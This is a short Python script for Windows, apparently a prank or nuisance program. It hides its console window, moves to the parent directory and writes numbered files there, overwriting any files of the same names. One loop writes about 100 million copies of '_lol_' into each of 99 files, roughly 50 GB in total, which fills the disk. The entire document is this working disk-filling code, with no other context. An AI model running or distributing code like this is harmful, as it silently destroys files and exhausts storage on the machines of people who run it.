import pathlib
import os
import ctypes
from pathlib import Path

path = Path(__file__).parents[1]
os.chdir(path)
str2 = ("_lol_")


for i in range(1,999):
    ctypes.windll.user32.ShowWindow( ctypes.windll.kernel32.GetConsoleWindow(), 0 )
    num = str(i)
    file = open(num,"w")
    for a in range(1,100):
        file.write(str2)
for i in range(1,100):
    ctypes.windll.user32.ShowWindow( ctypes.windll.kernel32.GetConsoleWindow(), 0 )
    num = str(i)
    file = open(num,"w")
    for a in range(1,99999999):
        file.write(str2)
for i in range(1,999):
    ctypes.windll.user32.ShowWindow( ctypes.windll.kernel32.GetConsoleWindow(), 0 )
    num = str(i)
    file = open(num,"w")
    for a in range(1,100):
        file.write(str2)
